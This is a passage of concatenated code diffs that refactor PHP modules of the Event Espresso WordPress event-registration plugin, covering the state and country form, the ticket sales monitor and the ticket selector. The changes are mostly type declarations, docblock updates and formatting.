+    public static function update_country_settings(string $CNT_ISO = '', int $STA_ID = 0, array $cols_n_values = [])
     {
         if (! $CNT_ISO) {
             EE_Error::add_error(
@@ -691,11 +692,11 @@ class EED_Add_New_State extends EED_Module
 
 
     /**
-     * @param EE_State[]                            $state_options
+     * @param EE_State[]                                              $state_options
      * @param EE_SPCO_Reg_Step_Attendee_Information|StateOptions|null $deprecated
-     * @param EE_Registration                       $registration
-     * @param EE_Question                           $question
-     * @param                                       $answer
+     * @param EE_Registration                                         $registration
+     * @param EE_Question|null                                        $question
+     * @param EE_Answer|null                                          $answer
      * @return array
      * @throws EE_Error
      * @throws ReflectionException
@@ -704,9 +705,9 @@ class EED_Add_New_State extends EED_Module
         array $state_options,
         $deprecated,
         EE_Registration $registration,
-        EE_Question $question,
-        $answer
-    ) {
+        ?EE_Question $question,
+        ?EE_Answer $answer
+    ): array {
         if (
             $answer instanceof EE_Answer && $question instanceof EE_Question
             && $question->type() === EEM_Question::QST_type_state
@@ -732,11 +733,11 @@ class EED_Add_New_State extends EED_Module
 
 
     /**
-     * @param EE_Country[]                          $country_options
+     * @param EE_Country[]                                              $country_options
      * @param EE_SPCO_Reg_Step_Attendee_Information|CountryOptions|null $deprecated
-     * @param EE_Registration                       $registration
-     * @param EE_Question                           $question
-     * @param                                       $answer
+     * @param EE_Registration                                           $registration
+     * @param EE_Question|null                                          $question
+     * @param EE_Answer|null                                            $answer
      * @return array
      * @throws EE_Error
      * @throws InvalidArgumentException
@@ -748,9 +749,9 @@ class EED_Add_New_State extends EED_Module
         array $country_options,
         $deprecated,
         EE_Registration $registration,
-        EE_Question $question,
-        $answer
-    ) {
+        ?EE_Question $question,
+        ?EE_Answer $answer
+    ): array {
         if (
             $answer instanceof EE_Answer && $question instanceof EE_Question
             && $question->type() === EEM_Question::QST_type_country
@@ -775,7 +776,7 @@ class EED_Add_New_State extends EED_Module
      * @throws EE_Error
      * @throws ReflectionException
      */
-    public static function state_options($state_options = [])
+    public static function state_options(array $state_options = []): array
     {
         $new_states = EED_Add_New_State::_get_new_states();
         foreach ($new_states as $new_state) {
@@ -796,7 +797,7 @@ class EED_Add_New_State extends EED_Module
      * @throws InvalidDataTypeException
      * @throws InvalidInterfaceException
      */
-    protected static function _get_new_states()
+    protected static function _get_new_states(): array
     {
         $new_states = [];
         if (EE_Registry::instance()->SSN instanceof EE_Session) {
@@ -814,7 +815,7 @@ class EED_Add_New_State extends EED_Module
      * @throws EE_Error
      * @throws ReflectionException
      */
-    public static function country_options($country_options = [])
+    public static function country_options(array $country_options = []): array
     {
         $new_states = EED_Add_New_State::_get_new_states();
         foreach ($new_states as $new_state) {

--- a/modules/add_new_state/EED_Add_New_State.module.php
+++ b/modules/add_new_state/EED_Add_New_State.module.php
@@ -701,7 +701,7 @@ class EED_Add_New_State extends EED_Module
      * @throws ReflectionException
      */
     public static function inject_new_reg_state_into_options(
-        array $state_options = array(),
+        array $state_options,
         $deprecated,
         EE_Registration $registration,
         EE_Question $question,
@@ -745,7 +745,7 @@ class EED_Add_New_State extends EED_Module
      * @throws ReflectionException
      */
     public static function inject_new_reg_country_into_options(
-        array $country_options = array(),
+        array $country_options,
         $deprecated,
         EE_Registration $registration,
         EE_Question $question,

--- a/modules/add_new_state/EED_Add_New_State.module.php
+++ b/modules/add_new_state/EED_Add_New_State.module.php
@@ -236,7 +236,8 @@ class EED_Add_New_State extends EED_Module
      * @throws EE_Error
      * @throws ReflectionException
      */
-    public static function display_add_new_state_micro_form(EE_Form_Section_Proper $question_group_reg_form
+    public static function display_add_new_state_micro_form(
+        EE_Form_Section_Proper $question_group_reg_form
     ): EE_Form_Section_Proper {
         $request = self::getRequest();
         // only add the 'new_state_micro_form' when displaying reg forms,
@@ -389,9 +390,9 @@ class EED_Add_New_State extends EED_Module
                                 ),
                                 'html_class'            => $input->html_class() . ' new-state-abbrv',
                                 'html_label_text'       => esc_html__(
-                                                               'New State/Province Abbreviation',
-                                                               'event_espresso'
-                                                           ) . ' *',
+                                    'New State/Province Abbreviation',
+                                    'event_espresso'
+                                ) . ' *',
                                 'other_html_attributes' => 'size="24"',
                                 'default'               => $request->getRequestParam($abbrv_name),
                                 'required'              => false,

--- a/modules/messages/EED_Messages.module.php
+++ b/modules/messages/EED_Messages.module.php
@@ -1334,7 +1334,7 @@ class EED_Messages extends EED_Module
         $class = '',
         $func = '',
         $line = '',
-        EE_Transaction $transaction,
+        EE_Transaction $transaction = null,
         $info = [],
         $display_request = false
     ) {

--- a/modules/ticket_sales_monitor/EED_Ticket_Sales_Monitor.module.php
+++ b/modules/ticket_sales_monitor/EED_Ticket_Sales_Monitor.module.php
@@ -246,7 +246,7 @@ class EED_Ticket_Sales_Monitor extends EED_Module
      * @throws UnexpectedEntityException
      * @throws EE_Error
      */
-    public static function validate_ticket_sale($qty = 1, EE_Ticket $ticket)
+    public static function validate_ticket_sale(int $qty, EE_Ticket $ticket)
     {
         $qty = absint($qty);
         if ($qty > 0) {
@@ -1006,7 +1006,7 @@ class EED_Ticket_Sales_Monitor extends EED_Module
      */
     protected static function release_reservations_for_tickets(
         array $tickets_with_reservations,
-        array $valid_reserved_ticket_line_items = array(),
+        array $valid_reserved_ticket_line_items,
         $source
     ) {
         $total_tickets_released = 0;

--- a/modules/ticket_sales_monitor/EED_Ticket_Sales_Monitor.module.php
+++ b/modules/ticket_sales_monitor/EED_Ticket_Sales_Monitor.module.php
@@ -2,7 +2,6 @@
 
 use EventEspresso\core\exceptions\InvalidDataTypeException;
 use EventEspresso\core\exceptions\InvalidInterfaceException;
-use EventEspresso\core\exceptions\InvalidSessionDataException;
 use EventEspresso\core\exceptions\UnexpectedEntityException;
 use EventEspresso\core\services\loaders\LoaderFactory;
 
@@ -19,25 +18,9 @@ use EventEspresso\core\services\loaders\LoaderFactory;
  */
 class EED_Ticket_Sales_Monitor extends EED_Module
 {
-    const debug = false;
+    const debug = false;    // true false
 
     private static $nl = '';
-
-    /**
-     * an array of raw ticket data from EED_Ticket_Selector
-     *
-     * @var array $ticket_selections
-     */
-    protected $ticket_selections = array();
-
-    /**
-     * the raw ticket data from EED_Ticket_Selector is organized in rows
-     * according to how they are displayed in the actual Ticket_Selector
-     * this tracks the current row being processed
-     *
-     * @var int $current_row
-     */
-    protected $current_row = 0;
 
     /**
      * an array for tracking names of tickets that have sold out
@@ -144,6 +127,8 @@ class EED_Ticket_Sales_Monitor extends EED_Module
 
     /**
      * @return EED_Ticket_Sales_Monitor|EED_Module
+     * @throws EE_Error
+     * @throws ReflectionException
      */
     public static function instance()
     {
@@ -152,10 +137,10 @@ class EED_Ticket_Sales_Monitor extends EED_Module
 
 
     /**
-     * @param WP_Query $WP_Query
+     * @param WP_Query $WP
      * @return    void
      */
-    public function run($WP_Query)
+    public function run($WP)
     {
     }
 
@@ -177,6 +162,7 @@ class EED_Ticket_Sales_Monitor extends EED_Module
      * @throws InvalidDataTypeException
      * @throws InvalidInterfaceException
      * @throws UnexpectedEntityException
+     * @throws ReflectionException
      */
     public static function release_tickets_for_expired_carts()
     {
@@ -217,7 +203,7 @@ class EED_Ticket_Sales_Monitor extends EED_Module
             }
             if (! empty($expired_ticket_IDs)) {
                 EED_Ticket_Sales_Monitor::release_reservations_for_tickets(
-                    \EEM_Ticket::instance()->get_tickets_with_IDs($expired_ticket_IDs),
+                    EEM_Ticket::instance()->get_tickets_with_IDs($expired_ticket_IDs),
                     array(),
                     __FUNCTION__
                 );
@@ -242,11 +228,12 @@ class EED_Ticket_Sales_Monitor extends EED_Module
      *
      * @param int       $qty
      * @param EE_Ticket $ticket
-     * @return bool
+     * @return int
      * @throws UnexpectedEntityException
      * @throws EE_Error
+     * @throws ReflectionException
      */
-    public static function validate_ticket_sale(int $qty, EE_Ticket $ticket)
+    public static function validate_ticket_sale(int $qty, EE_Ticket $ticket): int
     {
         $qty = absint($qty);
         if ($qty > 0) {
@@ -264,13 +251,14 @@ class EED_Ticket_Sales_Monitor extends EED_Module
     /**
      * checks whether an individual ticket is available for purchase based on datetime, and ticket details
      *
-     * @param   EE_Ticket $ticket
-     * @param int         $qty
+     * @param EE_Ticket|null $ticket
+     * @param int       $qty
      * @return int
      * @throws UnexpectedEntityException
      * @throws EE_Error
+     * @throws ReflectionException
      */
-    protected function _validate_ticket_sale(EE_Ticket $ticket, $qty = 1)
+    protected function _validate_ticket_sale(?EE_Ticket $ticket, int $qty = 1): int
     {
         // self::debug hardcoded to false
         if (self::debug) {
@@ -309,21 +297,21 @@ class EED_Ticket_Sales_Monitor extends EED_Module
         }
         if ($this->_reserve_ticket($ticket, $qty)) {
             return $qty;
-        } else {
-            return 0;
         }
+        return 0;
     }
 
 
     /**
      * increments ticket reserved based on quantity passed
      *
-     * @param    EE_Ticket $ticket
-     * @param int          $quantity
+     * @param EE_Ticket $ticket
+     * @param int       $quantity
      * @return bool indicating success or failure
      * @throws EE_Error
+     * @throws ReflectionException
      */
-    protected function _reserve_ticket(EE_Ticket $ticket, $quantity = 1)
+    protected function _reserve_ticket(EE_Ticket $ticket, int $quantity = 1): bool
     {
         // self::debug hardcoded to false
         if (self::debug) {
@@ -334,12 +322,13 @@ class EED_Ticket_Sales_Monitor extends EED_Module
 
 
     /**
-     * @param  EE_Ticket $ticket
-     * @param  int       $quantity
+     * @param EE_Ticket $ticket
+     * @param int       $quantity
      * @return bool
      * @throws EE_Error
+     * @throws ReflectionException
      */
-    protected function _release_reserved_ticket(EE_Ticket $ticket, $quantity = 1)
+    protected function _release_reserved_ticket(EE_Ticket $ticket, int $quantity = 1): bool
     {
         // self::debug hardcoded to false
         if (self::debug) {
@@ -350,17 +339,18 @@ class EED_Ticket_Sales_Monitor extends EED_Module
         if (self::debug) {
             echo self::$nl . ' . . . ticket->reserved after: ' . $ticket->reserved();
         }
-        return $ticket->save() ? 1 : 0;
+        return (bool) $ticket->save();
     }
 
 
     /**
      * removes quantities within the ticket selector based on zero ticket availability
      *
-     * @param    EE_Ticket $ticket
+     * @param EE_Ticket $ticket
      * @return    void
      * @throws UnexpectedEntityException
      * @throws EE_Error
+     * @throws ReflectionException
      */
     protected function _ticket_sold_out(EE_Ticket $ticket)
     {
@@ -376,10 +366,11 @@ class EED_Ticket_Sales_Monitor extends EED_Module
     /**
      * adjusts quantities within the ticket selector based on decreased ticket availability
      *
-     * @param    EE_Ticket $ticket
+     * @param EE_Ticket $ticket
      * @return void
      * @throws UnexpectedEntityException
      * @throws EE_Error
+     * @throws ReflectionException
      */
     protected function _ticket_quantity_decremented(EE_Ticket $ticket)
     {
@@ -395,12 +386,13 @@ class EED_Ticket_Sales_Monitor extends EED_Module
     /**
      * builds string out of ticket and event name
      *
-     * @param    EE_Ticket $ticket
+     * @param EE_Ticket $ticket
      * @return string
      * @throws UnexpectedEntityException
      * @throws EE_Error
+     * @throws ReflectionException
      */
-    protected function _get_ticket_and_event_name(EE_Ticket $ticket)
+    protected function _get_ticket_and_event_name(EE_Ticket $ticket): string
     {
         $event = $ticket->get_related_event();
         if ($event instanceof EE_Event) {
@@ -423,15 +415,16 @@ class EED_Ticket_Sales_Monitor extends EED_Module
     /**
      * releases or reserves ticket(s) based on quantity passed
      *
-     * @param  EE_Line_Item $line_item
-     * @param  int          $quantity
+     * @param EE_Line_Item $line_item
+     * @param int          $quantity
      * @return void
      * @throws EE_Error
      * @throws InvalidArgumentException
      * @throws InvalidDataTypeException
      * @throws InvalidInterfaceException
+     * @throws ReflectionException
      */
-    public static function ticket_quantity_updated(EE_Line_Item $line_item, $quantity = 1)
+    public static function ticket_quantity_updated(EE_Line_Item $line_item, int $quantity = 1)
     {
         $ticket = EEM_Ticket::instance()->get_one_by_ID(absint($line_item->OBJ_ID()));
         if ($ticket instanceof EE_Ticket) {
@@ -451,12 +444,13 @@ class EED_Ticket_Sales_Monitor extends EED_Module
     /**
      * releases reserved ticket(s) based on quantity passed
      *
-     * @param  EE_Ticket $ticket
-     * @param  int       $quantity
+     * @param EE_Ticket $ticket
+     * @param int       $quantity
      * @return void
      * @throws EE_Error
+     * @throws ReflectionException
      */
-    public static function ticket_removed_from_cart(EE_Ticket $ticket, $quantity = 1)
+    public static function ticket_removed_from_cart(EE_Ticket $ticket, int $quantity = 1)
     {
         $ticket->add_extra_meta(
             EE_Ticket::META_KEY_TICKET_RESERVATIONS,
@@ -473,10 +467,7 @@ class EED_Ticket_Sales_Monitor extends EED_Module
     /**
      * @return void
      * @throws EE_Error
-     * @throws InvalidArgumentException
      * @throws ReflectionException
-     * @throws InvalidDataTypeException
-     * @throws InvalidInterfaceException
      */
     public static function post_notices()
     {
@@ -559,12 +550,12 @@ class EED_Ticket_Sales_Monitor extends EED_Module
      * releases reserved tickets for all registrations of an EE_Transaction
      * by default, will NOT release tickets for finalized transactions
      *
-     * @param    EE_Transaction $transaction
+     * @param EE_Transaction $transaction
      * @return int
      * @throws EE_Error
-     * @throws InvalidSessionDataException
+     * @throws ReflectionException
      */
-    protected function _release_all_reserved_tickets_for_transaction(EE_Transaction $transaction)
+    protected function _release_all_reserved_tickets_for_transaction(EE_Transaction $transaction): int
     {
         // self::debug hardcoded to false
         if (self::debug) {
@@ -641,11 +632,12 @@ class EED_Ticket_Sales_Monitor extends EED_Module
      * @param EE_Transaction  $transaction
      * @return int
      * @throws EE_Error
+     * @throws ReflectionException
      */
     protected function _release_reserved_ticket_for_registration(
         EE_Registration $registration,
         EE_Transaction $transaction
-    ) {
+    ): int {
         $STS_ID = $transaction->status_ID();
         // self::debug hardcoded to false
         if (self::debug) {
@@ -666,9 +658,9 @@ class EED_Ticket_Sales_Monitor extends EED_Module
         ) {
             if (self::debug) {
                 echo self::$nl . self::$nl . ' . . RELEASE RESERVED TICKET';
-                $rsrvd = $registration->get_extra_meta(EE_Registration::HAS_RESERVED_TICKET_KEY, true);
+                $reserved = $registration->get_extra_meta(EE_Registration::HAS_RESERVED_TICKET_KEY, true);
                 echo self::$nl . ' . . . registration HAS_RESERVED_TICKET_KEY: ';
-                var_dump($rsrvd);
+                var_dump($reserved);
             }
             $registration->release_reserved_ticket(true, 'TicketSalesMonitor:' . __LINE__);
             return 1;
@@ -728,6 +720,7 @@ class EED_Ticket_Sales_Monitor extends EED_Module
      * releases reserved tickets in the EE_Cart
      *
      * @param EE_Cart $cart
+     * @param EE_Session $session
      * @return void
      * @throws EE_Error
      * @throws InvalidArgumentException
@@ -786,7 +779,7 @@ class EED_Ticket_Sales_Monitor extends EED_Module
      * @param EE_Session $session
      * @return void
      * @throws EE_Error
-     * @throws InvalidSessionDataException
+     * @throws ReflectionException
      */
     public static function session_checkout_reset(EE_Session $session)
     {
@@ -807,7 +800,7 @@ class EED_Ticket_Sales_Monitor extends EED_Module
      * @param EE_Checkout $checkout
      * @return void
      * @throws EE_Error
-     * @throws InvalidSessionDataException
+     * @throws ReflectionException
      */
     protected function _session_checkout_reset(EE_Checkout $checkout)
     {
@@ -847,7 +840,7 @@ class EED_Ticket_Sales_Monitor extends EED_Module
      * @param EE_Transaction $transaction
      * @return void
      * @throws EE_Error
-     * @throws InvalidSessionDataException
+     * @throws ReflectionException
      */
     public static function process_abandoned_transactions(EE_Transaction $transaction)
     {
@@ -900,7 +893,7 @@ class EED_Ticket_Sales_Monitor extends EED_Module
      * @param EE_Transaction $transaction
      * @return void
      * @throws EE_Error
-     * @throws InvalidSessionDataException
+     * @throws ReflectionException
      */
     public static function process_failed_transactions(EE_Transaction $transaction)
     {
@@ -928,7 +921,7 @@ class EED_Ticket_Sales_Monitor extends EED_Module
      * @throws UnexpectedEntityException
      * @throws ReflectionException
      */
-    public static function reset_reservation_counts()
+    public static function reset_reservation_counts(): int
     {
         /** @var EE_Line_Item[] $valid_reserved_tickets */
         $valid_reserved_tickets = array();
@@ -971,8 +964,10 @@ class EED_Ticket_Sales_Monitor extends EED_Module
     /**
      * @param EE_Line_Item $total_line_item
      * @return EE_Line_Item[]
+     * @throws EE_Error
+     * @throws ReflectionException
      */
-    private static function get_ticket_line_items_for_grand_total(EE_Line_Item $total_line_item)
+    private static function get_ticket_line_items_for_grand_total(EE_Line_Item $total_line_item): array
     {
         /** @var EE_Line_Item[] $valid_reserved_tickets */
         $valid_reserved_tickets = array();
@@ -993,22 +988,26 @@ class EED_Ticket_Sales_Monitor extends EED_Module
      * whose transactions aren't complete and also aren't yet expired (ie, they're incomplete and younger than the
      * session's expiry time) to update the ticket (and their datetimes') reserved counts.
      *
-     * @param EE_Ticket[]    $tickets_with_reservations all tickets with TKT_reserved > 0
+     * @param EE_Ticket[]    $tickets_with_reservations        all tickets with TKT_reserved > 0
      * @param EE_Line_Item[] $valid_reserved_ticket_line_items all line items for tickets and incomplete transactions
-     *                       whose session has NOT expired. We will use these to determine the number of ticket
-     *                       reservations are now invalid. We don't use the list of invalid ticket line items because
-     *                       we don't know which of those have already been taken into account when reducing ticket
-     *                       reservation counts, and which haven't.
+     *                                                         whose session has NOT expired. We will use these to
+     *                                                         determine the number of ticket reservations are now
+     *                                                         invalid. We don't use the list of invalid ticket line
+     *                                                         items because we don't know which of those have already
+     *                                                         been taken into account when reducing ticket reservation
+     *                                                         counts, and which haven't.
+     * @param string $source
      * @return int
      * @throws UnexpectedEntityException
      * @throws DomainException
      * @throws EE_Error
+     * @throws ReflectionException
      */
     protected static function release_reservations_for_tickets(
         array $tickets_with_reservations,
-        array $valid_reserved_ticket_line_items,
-        $source
-    ) {
+        array $valid_reserved_ticket_line_items = [],
+        string $source = ''
+    ): int {
         $total_tickets_released = 0;
         $sold_out_events = array();
         foreach ($tickets_with_reservations as $ticket_with_reservations) {
@@ -1067,8 +1066,9 @@ class EED_Ticket_Sales_Monitor extends EED_Module
      * @throws InvalidArgumentException
      * @throws InvalidDataTypeException
      * @throws InvalidInterfaceException
+     * @throws ReflectionException
      */
-    public static function clear_expired_line_items_with_no_transaction($timestamp = 0)
+    public static function clear_expired_line_items_with_no_transaction(int $timestamp = 0)
     {
         /** @type WPDB $wpdb */
         global $wpdb;

--- a/modules/ticket_selector/ProcessTicketSelector.php
+++ b/modules/ticket_selector/ProcessTicketSelector.php
@@ -70,11 +70,11 @@ class ProcessTicketSelector
      * so that all dependencies get injected correctly (which will happen automatically)
      * Null values for parameters are only for backwards compatibility but will be removed later on.
      *
-     * @param EE_Core_Config                    $core_config
-     * @param RequestInterface                           $request
-     * @param EE_Session                        $session
-     * @param EEM_Ticket                        $ticket_model
-     * @param TicketDatetimeAvailabilityTracker $tracker
+     * @param EE_Core_Config|null                    $core_config
+     * @param RequestInterface|null                  $request
+     * @param EE_Session|null                        $session
+     * @param EEM_Ticket|null                        $ticket_model
+     * @param TicketDatetimeAvailabilityTracker|null $tracker
      * @throws InvalidArgumentException
      * @throws InvalidDataTypeException
      * @throws InvalidInterfaceException
@@ -115,7 +115,7 @@ class ProcessTicketSelector
      * @throws InvalidDataTypeException
      * @throws ReflectionException
      */
-    public function cancelTicketSelections()
+    public function cancelTicketSelections(): bool
     {
         // check nonce
         if (! $this->processTicketSelectorNonce()) {
@@ -141,7 +141,7 @@ class ProcessTicketSelector
      *
      * @return bool
      */
-    private function processTicketSelectorNonce()
+    private function processTicketSelectorNonce(): bool
     {
         if (
             ! $this->request->isAdmin()
@@ -181,7 +181,7 @@ class ProcessTicketSelector
      * @throws InvalidInterfaceException
      * @throws ReflectionException
      */
-    public function processTicketSelections()
+    public function processTicketSelections(): bool
     {
         do_action('EED_Ticket_Selector__process_ticket_selections__before');
         if ($this->request->isBot()) {
@@ -272,6 +272,7 @@ class ProcessTicketSelector
      * @throws InvalidArgumentException
      * @throws InvalidDataTypeException
      * @throws InvalidInterfaceException
+     * @throws ReflectionException
      */
     private function addTicketsToCart(array $valid)
     {
@@ -345,7 +346,7 @@ class ProcessTicketSelector
      * @throws InvalidDataTypeException
      * @throws EE_Error
      */
-    private function addTicketToCart(EE_Ticket $ticket, $qty = 1)
+    private function addTicketToCart(EE_Ticket $ticket, int $qty = 1): bool
     {
         // get the number of spaces left for this datetime ticket
         $available_spaces = $this->tracker->ticketDatetimeAvailability($ticket);
@@ -384,7 +385,7 @@ class ProcessTicketSelector
      * @throws EE_Error
      * @throws InvalidArgumentException
      */
-    private function processSuccessfulCart($tickets_added)
+    private function processSuccessfulCart($tickets_added): bool
     {
         // exit('KILL REDIRECT BEFORE CART UPDATE'); // <<<<<<<<<<<<<<<<< KILL REDIRECT HERE BEFORE CART UPDATE
         if (apply_filters('FHEE__EED_Ticket_Selector__process_ticket_selections__success', $tickets_added)) {

--- a/modules/ticket_selector/TicketDetails.php
+++ b/modules/ticket_selector/TicketDetails.php
@@ -121,32 +121,32 @@ class TicketDetails
             return '';
         }
         return EEH_HTML::link(
-                '',
-                sprintf(esc_html__('show%1$sdetails%1$s+', 'event_espresso'), '&nbsp;'),
-                esc_attr(
-                    apply_filters(
-                        'FHEE__ticket_selector_chart_template__show_ticket_details_link_title',
-                        esc_html__('click to show additional ticket details', 'event_espresso')
-                    )
-                ),
-                "display-{$this->cssId()}",
-                'display-tckt-slctr-tkt-details display-the-hidden lt-grey-text smaller-text hide-if-no-js',
-                '',
-                'rel="' . $this->cssId() . '"'
-            ) . EEH_HTML::link(
-                '',
-                sprintf(esc_html__('hide%1$sdetails%1$s-', 'event_espresso'), '&nbsp;'),
-                esc_attr(
-                    apply_filters(
-                        'FHEE__ticket_selector_chart_template__hide_ticket_details_link_title',
-                        esc_html__('click to hide additional ticket details', 'event_espresso')
-                    )
-                ),
-                "hide-{$this->cssId()}",
-                'hide-tckt-slctr-tkt-details hide-the-displayed lt-grey-text smaller-text hide-if-no-js',
-                'display:none;',
-                'rel="' . $this->cssId() . '"'
-            );
+            '',
+            sprintf(esc_html__('show%1$sdetails%1$s+', 'event_espresso'), '&nbsp;'),
+            esc_attr(
+                apply_filters(
+                    'FHEE__ticket_selector_chart_template__show_ticket_details_link_title',
+                    esc_html__('click to show additional ticket details', 'event_espresso')
+                )
+            ),
+            "display-{$this->cssId()}",
+            'display-tckt-slctr-tkt-details display-the-hidden lt-grey-text smaller-text hide-if-no-js',
+            '',
+            'rel="' . $this->cssId() . '"'
+        ) . EEH_HTML::link(
+            '',
+            sprintf(esc_html__('hide%1$sdetails%1$s-', 'event_espresso'), '&nbsp;'),
+            esc_attr(
+                apply_filters(
+                    'FHEE__ticket_selector_chart_template__hide_ticket_details_link_title',
+                    esc_html__('click to hide additional ticket details', 'event_espresso')
+                )
+            ),
+            "hide-{$this->cssId()}",
+            'hide-tckt-slctr-tkt-details hide-the-displayed lt-grey-text smaller-text hide-if-no-js',
+            'display:none;',
+            'rel="' . $this->cssId() . '"'
+        );
     }
 
 

--- a/modules/ticket_selector/TicketDetails.php
+++ b/modules/ticket_selector/TicketDetails.php
@@ -3,6 +3,12 @@
 namespace EventEspresso\modules\ticket_selector;
 
 // phpcs:disable PEAR.Functions.ValidDefaultValue.NotAtEnd
+use EE_Error;
+use EE_Ticket;
+use EE_Ticket_Selector_Config;
+use EEH_HTML;
+use EEH_Template;
+use ReflectionException;
 
 /**
  * Class TicketDetails
@@ -14,12 +20,12 @@ namespace EventEspresso\modules\ticket_selector;
 class TicketDetails
 {
     /**
-     * @var \EE_Ticket $ticket
+     * @var EE_Ticket $ticket
      */
     protected $ticket;
 
     /**
-     * @var \EE_Ticket_Selector_Config $template_settings
+     * @var EE_Ticket_Selector_Config $template_settings
      */
     protected $template_settings;
 
@@ -42,27 +48,27 @@ class TicketDetails
     /**
      * TicketDetails constructor.
      *
-     * @param \EE_Ticket                 $ticket
-     * @param \EE_Ticket_Selector_Config $template_settings
-     * @param array                      $template_args
+     * @param EE_Ticket                 $ticket
+     * @param EE_Ticket_Selector_Config $template_settings
+     * @param array                     $template_args
      */
     public function __construct(
-        \EE_Ticket $ticket,
-        \EE_Ticket_Selector_Config $template_settings,
+        EE_Ticket $ticket,
+        EE_Ticket_Selector_Config $template_settings,
         array $template_args
     ) {
-        $this->ticket = $ticket;
+        $this->ticket            = $ticket;
         $this->template_settings = $template_settings;
-        $this->date_format = $template_args['date_format'];
-        $this->time_format = $template_args['time_format'];
-        $this->event_is_expired = $template_args['event_is_expired'];
+        $this->date_format       = $template_args['date_format'];
+        $this->time_format       = $template_args['time_format'];
+        $this->event_is_expired  = $template_args['event_is_expired'];
     }
 
 
     /**
-     * @return \EE_Ticket
+     * @return EE_Ticket
      */
-    public function getTicket()
+    public function getTicket(): EE_Ticket
     {
         return $this->ticket;
     }
@@ -71,16 +77,16 @@ class TicketDetails
     /**
      * @return bool
      */
-    public function showTicketDetails()
+    public function showTicketDetails(): bool
     {
         return $this->template_settings->show_ticket_details;
     }
 
 
     /**
-     * @return \EE_Ticket_Selector_Config
+     * @return EE_Ticket_Selector_Config
      */
-    public function getTemplateSettings()
+    public function getTemplateSettings(): EE_Ticket_Selector_Config
     {
         return $this->template_settings;
     }
@@ -89,7 +95,7 @@ class TicketDetails
     /**
      * @return string
      */
-    public function getDateFormat()
+    public function getDateFormat(): string
     {
         return $this->date_format;
     }
@@ -98,7 +104,7 @@ class TicketDetails
     /**
      * @return string
      */
-    public function getTimeFormat()
+    public function getTimeFormat(): string
     {
         return $this->time_format;
     }
@@ -106,46 +112,50 @@ class TicketDetails
 
     /**
      * @return string
+     * @throws EE_Error
+     * @throws ReflectionException
      */
-    public function getShowHideLinks()
+    public function getShowHideLinks(): string
     {
         if (! $this->showTicketDetails()) {
             return '';
         }
-        return \EEH_HTML::link(
-            '',
-            sprintf(esc_html__('show%1$sdetails%1$s+', 'event_espresso'), '&nbsp;'),
-            esc_attr(
-                apply_filters(
-                    'FHEE__ticket_selector_chart_template__show_ticket_details_link_title',
-                    esc_html__('click to show additional ticket details', 'event_espresso')
-                )
-            ),
-            "display-{$this->cssId()}",
-            'display-tckt-slctr-tkt-details display-the-hidden lt-grey-text smaller-text hide-if-no-js',
-            '',
-            'rel="' . $this->cssId() . '"'
-        ) . \EEH_HTML::link(
-            '',
-            sprintf(esc_html__('hide%1$sdetails%1$s-', 'event_espresso'), '&nbsp;'),
-            esc_attr(
-                apply_filters(
-                    'FHEE__ticket_selector_chart_template__hide_ticket_details_link_title',
-                    esc_html__('click to hide additional ticket details', 'event_espresso')
-                )
-            ),
-            "hide-{$this->cssId()}",
-            'hide-tckt-slctr-tkt-details hide-the-displayed lt-grey-text smaller-text hide-if-no-js',
-            'display:none;',
-            'rel="' . $this->cssId() . '"'
-        );
+        return EEH_HTML::link(
+                '',
+                sprintf(esc_html__('show%1$sdetails%1$s+', 'event_espresso'), '&nbsp;'),
+                esc_attr(
+                    apply_filters(
+                        'FHEE__ticket_selector_chart_template__show_ticket_details_link_title',
+                        esc_html__('click to show additional ticket details', 'event_espresso')
+                    )
+                ),
+                "display-{$this->cssId()}",
+                'display-tckt-slctr-tkt-details display-the-hidden lt-grey-text smaller-text hide-if-no-js',
+                '',
+                'rel="' . $this->cssId() . '"'
+            ) . EEH_HTML::link(
+                '',
+                sprintf(esc_html__('hide%1$sdetails%1$s-', 'event_espresso'), '&nbsp;'),
+                esc_attr(
+                    apply_filters(
+                        'FHEE__ticket_selector_chart_template__hide_ticket_details_link_title',
+                        esc_html__('click to hide additional ticket details', 'event_espresso')
+                    )
+                ),
+                "hide-{$this->cssId()}",
+                'hide-tckt-slctr-tkt-details hide-the-displayed lt-grey-text smaller-text hide-if-no-js',
+                'display:none;',
+                'rel="' . $this->cssId() . '"'
+            );
     }
 
 
     /**
      * @return string
+     * @throws EE_Error
+     * @throws ReflectionException
      */
-    public function cssId()
+    public function cssId(): string
     {
         return apply_filters(
             'FHEE__ticket_selector_chart_template__ticket_details_css_id',
@@ -159,34 +169,37 @@ class TicketDetails
      * @param int   $remaining
      * @param int   $cols
      * @return string
+     * @throws EE_Error
+     * @throws ReflectionException
      */
     public function display(
-        $ticket_price = 0.00,
-        $remaining,
-        $cols = 2
-    ) {
-        $template_args = array();
-        $template_args['ticket'] = $this->ticket;
-        $template_args['ticket_price'] = $ticket_price;
-        $template_args['remaining'] = $remaining;
-        $template_args['cols'] = $cols;
-        $template_args['show_ticket_details'] = $this->template_settings->show_ticket_details;
+        float $ticket_price = 0.00,
+        int $remaining = 0,
+        int $cols = 2
+    ): string {
+        $template_args                             = [];
+        $template_args['ticket']                   = $this->ticket;
+        $template_args['ticket_price']             = $ticket_price;
+        $template_args['remaining']                = $remaining;
+        $template_args['cols']                     = $cols;
+        $template_args['show_ticket_details']      = $this->template_settings->show_ticket_details;
         $template_args['show_ticket_sale_columns'] = $this->template_settings->show_ticket_sale_columns;
         $template_args['ticket_details_row_class'] = espresso_get_object_css_class($this->ticket, '', 'details');
-        $template_args['ticket_details_css_id'] = $this->cssId();
-        $template_args['display_ticket_price'] = $ticket_price !== 0 && apply_filters(
-            'FHEE__ticket_selector_chart_template__display_ticket_price_details',
-            true
-        );
-        $template_args['price_breakdown_heading'] = apply_filters(
+        $template_args['ticket_details_css_id']    = $this->cssId();
+        $template_args['display_ticket_price']     = $ticket_price !== 0.0
+                                                     && apply_filters(
+                                                         'FHEE__ticket_selector_chart_template__display_ticket_price_details',
+                                                         true
+                                                     );
+        $template_args['price_breakdown_heading']  = apply_filters(
             'FHEE__ticket_selector_chart_template__ticket_details_price_breakdown_heading',
             esc_html__('Price', 'event_espresso')
         );
-        $template_args['date_format'] = $this->date_format;
-        $template_args['time_format'] = $this->time_format;
-        $template_args['event_is_expired'] = $this->event_is_expired;
+        $template_args['date_format']              = $this->date_format;
+        $template_args['time_format']              = $this->time_format;
+        $template_args['event_is_expired']         = $this->event_is_expired;
 
-        return \EEH_Template::locate_template(
+        return EEH_Template::locate_template(
             apply_filters(
                 'FHEE__EventEspresso_modules_ticket_selector_TicketDetails__display__template_path',
